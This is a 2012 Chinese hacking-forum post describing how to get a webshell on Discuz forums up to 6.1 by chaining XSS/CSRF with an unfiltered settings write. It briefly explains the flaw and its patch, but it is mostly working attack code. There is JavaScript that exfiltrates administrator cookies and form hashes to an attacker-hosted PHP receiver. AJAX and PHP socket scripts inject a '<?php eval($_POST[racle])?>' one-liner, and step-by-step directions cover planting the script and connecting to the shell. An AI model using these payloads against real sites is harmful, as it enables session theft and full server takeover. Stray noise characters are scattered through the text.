找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3743|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell3 G" S/ ^! O% d/ h2 C( G! ]2 k
By racle @tian6.com8 I; K5 V5 \) E( m) f
欢迎转帖.但请保留版权信息.
) E* b! d. d  {8 Z: d0 }受影响版本iscuz<=6.1.0,gbk+utf+big5
# l, |" q2 d! V( X# m- s* {+ T+ g' s- f$ G
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
% h$ I0 G) K! l9 Z* t
2 F  z; f, d3 q& [3 y, x7 V; |# t+ d7 ]* ]
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
+ `, e  Q5 _+ D- Q$ s! V当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
! W# V2 |6 U0 t9 b2 n; ^: V( m% Y3 O! Y" ]0 U: ~
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..8 p2 G8 O* B% A, L- v! b& u# g
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS, @6 j3 f$ U6 w. h! O

$ M8 v1 R: ?' Q, N: s& D8 t! q5 p: }4 {* q- f/ x! g; L
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------# y1 t: g" _1 w3 k0 i0 N# Y9 W
7 ]7 m$ ^4 U' H. U! |! R& r1 W
# t0 P7 a- p! q# }( I
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
* U0 _0 X0 c8 N4 r, M4 x, \
% u: W9 _7 N2 t. Sproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
% Z- [: E, T/ N: Y6 q3 [+ b" k  J1 S- P8 m/ c7 S
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
1 r; u6 r! y8 c6 ]3 m; t
0 C2 Q0 C( C6 z1 `5 L0 W8 G# Z. h& q, v7 _4 @% n2 y
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
* Y+ q# i" ], G  b/ s! y
. f4 L5 D  ^: l0 }0 S! x- n        global $runwizardfile, $runwizardhistory;( Z) [, Q, G4 l4 m# h
' t% |) }- T, X2 N  j
        $fp = fopen($runwizardfile, 'w');
) C, G" |3 V& Q% ^8 j# e3 A( n1 q; s6 Y- I  a8 x
        fwrite($fp, serialize($runwizardhistory));( B* T4 I# M( U& H+ a, M
7 l* N. B3 {& \5 {  x' V
        fclose($fp);
; D/ A; Y: d  g4 x
# s* B5 @# }* e" f! r. F}5 }9 {6 i* i! b1 b& j
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
$ `8 m* H2 S0 u; k& E以下是修补的办法:function saverunwizardhistory() {% V% ?! s! _. C$ M
* F: Z3 N6 `$ ^  ]+ m/ e' n
        global $runwizardfile, $runwizardhistory;- z. ~, m1 Y. E& y

6 v( R/ G" [9 \1 K+ g/ a6 [; s        $fp = fopen($runwizardfile, 'w');
$ C& f7 h2 [! Z! e
0 I1 J& x! q0 x2 p6 G        $s = '<?php exit;?>';( x- O& P7 J+ t+ d3 c/ f" ]3 e
+ w9 E5 T; H0 h$ R' M, ?
        $s .= serialize($runwizardhistory);
1 C$ _( N9 k) j: w* f; u+ Q- o- a
! H8 n6 O' E/ Q1 I        fwrite($fp, $s);/ F- T. j+ W, m: ~
6 x! k$ l. {4 \/ h2 T$ e* L
        fclose($fp);$ P+ }1 h0 ]6 T. S+ z' O4 ~& e0 ~2 D
0 r+ I3 a7 D/ H3 u" I8 P
}% R5 f$ }& T. a( G
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
* F4 h. [7 z  O0 l' ?+ d! B! s' I1 p$ i9 L
) o5 l/ I9 _9 b  y
  ~- S  k* `2 ?$ K/ b
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
+ P6 P% W% O0 g7 B7 f0 S2 Y7 ?" |1 [! \: r1 o
: Q) E! l# {2 Y
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.  g0 v+ j/ l. l* H" ?- S5 w
" W! W7 g6 \# v6 X
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.3 ~  ]. s! A, x. f- z; J! V; X8 C
! m6 _: t. P6 c- J+ V
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
6 s1 n* V) v% A* W
3 {( Z5 s) S4 ~9 T8 m首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:: E  g6 s8 s6 x  n. L& \
9 j! T$ n! l' ?3 |
var url="http://目标网站/admincp.php";      6 I' H* p* ^' D+ S4 [
& D" l. f- @/ s! h$ X% ]
/*获得cookies*/' u, {3 d4 h7 G0 |1 r* F

+ A' |- J6 w# T( m3 m# Jfunction getURL(s) {; R, ?( d5 H" n5 z3 z
2 _- `+ k$ q1 l0 w9 Y6 M
var image = new Image();
  c5 i* H7 F7 l, h0 J* @
2 ~* `$ h( B5 R2 Dimage.style.width = 0;0 r( j* E% P& E3 S# q4 H0 ^

5 j  B$ {8 j* O. ximage.style.height = 0;: x8 f& W# V% k

, `) P; ~/ u& @- Q- aimage.src = s;
, Q9 O/ u2 m- n, v9 ~
$ q3 C* D4 }! X& H0 W1 ^1 x0 g# O}5 _1 q( W$ a# P; D2 s( R

$ C  `( i3 l9 u0 s$ ^5 EgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
; G- y, J9 J: ?7 C6 P4 \复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];3 Y" Q, P1 F3 o8 P( l& m$ D
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
3 ~( ]% ^! k' E8 C( o7 a4 I, T2 q+ I8 l3 o* E5 F; {+ N$ L% n

' }! b( X$ Z/ F2 S* g+ r8 b获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
' `9 X# i7 {: ^+ m3 P8 L) p
6 ^. F! w1 r  N' U' W' f% Z0 O4 V2 @$ k
* ^! U1 ]1 S* `) z) ^( Y6 M
/*hash*/
& O2 N% M( L( F) ]. x& G. X# e: A$ h  T  i1 ?7 l
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");8 f& e+ h% b7 ]  t) }! @& ^% `8 B
0 T' h# J; S! M! }/ }3 W  G
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
+ T8 i3 a* M5 ?- T$ L$ A
2 U4 i& ?0 {! I; TxmlHttpReq.send();! H4 F2 Z& |1 i& ~
3 o. w# ~  U& C$ e$ i4 n$ r
var resource = xmlHttpReq.responseText;
# p  V; o. S( K& y6 E
/ S! ]0 O0 P, \+ A3 n( P' [) Wvar numero = resource.search(/formhash/);' d6 D: l( T) g1 Z

  q: |6 q4 v8 A$ G2 F0 {var formhash=encodeURIComponent(resource.substr(numero+17,8));, l% \+ M9 g& t' j0 @  s
9 w8 x+ v, _( l- w( P! K  l

+ v* D% M; T5 K: n- B; v
1 _+ _5 r- R& f0 gvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
- D% q4 K" T) A: k4 ?( P0 W, g5 U
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
; `. ~$ q5 _: O; Z* V: n! @; k$ ]) Z0 b1 c* k# G
xmlHttpReq.setRequestHeader("Referer", url);+ z+ ~* w1 y$ d, K! b4 R, v2 G
# ?9 Z0 I2 A8 ?" \% U: c
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");  M2 A' \8 F8 h0 U( f5 x! \; D9 B. w
3 i6 l; y# x" L  `5 C6 l
xmlHttpReq.setrequestheader("content-length",post.length); 2 C3 l' O8 L9 j1 k" `2 l' ?* o2 o
2 M+ j/ e2 G) P: F6 m
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
# t/ w% F2 K$ O9 N) c9 D) t! F* w" \
xmlHttpReq.send(post);//发送数据8 }2 p8 L0 I  e0 G1 `/ |5 t
复制代码这里HASH我假设正确,这样提交,也无须cookies- q6 g7 b# ~) V2 Y

3 K$ G* _* Y+ e" j* `' @' Q再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);% ~+ u$ Q0 o4 ^! P6 _$ ?: r

" v9 Q. ~. q5 G7 z9 H- Z0 l7 oif (!$sock) die("$errstr ($errno)\n");3 R4 T1 A% M# V& U1 S! u+ _$ ~
* [. y0 J: _+ F! ?& o
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';$ H/ S. F& S$ W3 `$ R# X
1 K& j9 a  m# w( N% n+ c' p

" Z# C. y' K8 H: J) X* c6 e; z. Y& A% T$ w# v' y
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");6 D, U9 a0 g$ Q* {
" w% n6 Z+ Z: K4 T6 Q9 C
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
% R8 g8 ?* U; A  }2 g& u% X) p  P  g2 {" A
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
! U* c/ X" K" Z7 @
  @* k, y* q% d, [8 ffwrite($sock, "Accept-Language: zh-cn\r\n");
$ o/ n+ h2 {1 f& e% D6 S
( F. K" i3 C. bfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
% H2 \$ x" q/ j* {0 X" F$ z  g' K6 j. W: |  `5 |( T% O5 ^* t
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
1 e; z4 r( o$ ^# m: l  t5 M1 k$ f4 n4 A7 [3 f& o& i' w1 z
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");! k$ A: @* h" ?9 |# P

6 l; G$ O' @  m' O- c; ?) l- @fwrite($sock, "Host: $url\r\n");
1 o9 w( d" z7 Z5 ^! p" U, k% b8 w7 Y0 G5 R3 q  t8 K, N( s5 U7 F9 y
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
7 P4 |9 s4 ]$ o) ^% b. g5 w' B
1 u$ d2 {& |/ E# b+ D6 zfwrite($sock, "Connection: Keep-Alive\r\n");9 G& _* w" [) J) A

- j1 H' m, x2 f, P9 W) zfwrite($sock, "Cache-Control: no-cache\r\n");2 a( l; a3 m* _% t/ v0 I6 b
, D% s, b0 _5 n$ K  W
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");1 y1 o; r0 n- R- H, y$ J

2 V+ ^$ ^, x' e: C" @fwrite($sock, $data);
5 O( _" t% J" w- n7 k  m* q" V# I% l( y' M6 V

" Z! U" v4 U+ J9 [2 i! T& l$ F. K: B1 T
$headers = "";9 G1 v+ ~# B% [

# V8 M1 y; u( Uwhile ($str = trim(fgets($sock, 4096)))
6 ?' g: D3 N. W! T9 P) ]/ x6 ^( b5 I/ d% G, a
     $headers .= "$str\n";
+ T* q2 y3 d% D' i$ x! Y  y* U/ M9 Y8 w, E6 I0 Q4 K4 R
echo "\n";" W. F& w5 b. L2 K& Y5 a' }

; m# }9 L# r6 ~- E' T# h6 P3 e$body = "";  T( L6 I; R  G2 H3 ?7 d& ~

' S4 u" X, P5 a7 x! Jwhile (!feof($sock))
2 U9 z# c2 C; R1 b1 U% ^& ?# L# C( l
     $body .= fgets($sock, 4096);
0 K$ V2 l7 `) N0 T8 F$ @; |% p: v' H  j. R% m# s4 I" u
fclose($sock);
' b! c! h7 [2 @1 e" w# c5 N5 Q% X6 @+ y3 M5 T/ N
echo $body;
9 Y# j% ^) s5 |复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
, N2 k3 T1 P  O1 G
! R7 `/ G/ P5 ]3 U- W' R! X9 D" a* v1 S# ^# g! ?
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------) j. h- s7 v4 ]2 H: _2 b

: K% A# w: r* B# i; V
( N9 r; C. }- B+ {: I  d  o1HP SOCKET利用方法首先打开racle.js
% l5 E: f! J: G
) J& m1 u5 z  ~8 ^6 L+ H1 Lvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home5 q* V* y' T$ a  }$ f2 }3 l# A

8 Q# c+ E; W( ]. b. S5 L2 s" C/ z' {

9 l$ w) M/ M* s& X然后打开racle@tian6.php
* t! J2 V* [' s  {: v6 w6 J/ c
+ _6 p4 w* J# k' I' z$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com6 T' v* r0 G4 c# K
3 s3 [3 y8 z" U
3 `$ G0 x$ q! u7 p
! n: V' \8 v6 h' s8 f- y. r7 Y+ P3 F8 A
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:- a: s6 p  e: b) N

! {- a8 n9 |: T6 wgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
. v5 v+ |5 ]  k& J# Z5 b& k8 i& ?( V% A* X$ Z4 f8 T+ h

. \2 U3 |1 b0 R  S" D+ V
% [# F) p" h  \6 w1 a, h1 cgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
7 a, Z3 Y- ?( y1 e) F复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.8 W% Z  U6 x2 b6 g' d* a+ [! F

3 B; |7 o: r2 O% Q
3 i' I8 S7 Q; t; b, M" _! h  ^* i; }  z
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:4 V, K# v9 W3 ~6 o, H

; O2 _! V4 e( N, Q+ wvar formhash=encodeURIComponent(resource.substr(numero+17,8));
; J3 l$ S8 {! a$ w2 w4 H8 d- a3 R6 L2 Z3 S( \
5 i2 I0 y$ P! d, J9 }* I
3 r9 W. B. }: H7 B1 b3 w: P
var formhash=encodeURIComponent(resource.substr(numero+9,8));
! b' G* s4 Z7 w1 C6 C/ A, e6 c复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
/ L. f  ?5 `4 j% B0 e* j  z( C# }' }4 R, \& \! F
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.+ j* B+ G  v& S9 Q
; |$ |! s' S! t2 Q. U
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.) e1 t3 B! }# z7 O- g& A) p2 n. O
, x% B4 y; X7 X4 H1 U( Z
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
6 E! @" h. k6 h: ]- b/ d6 y+ w ) `7 Y/ C; K( R! u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表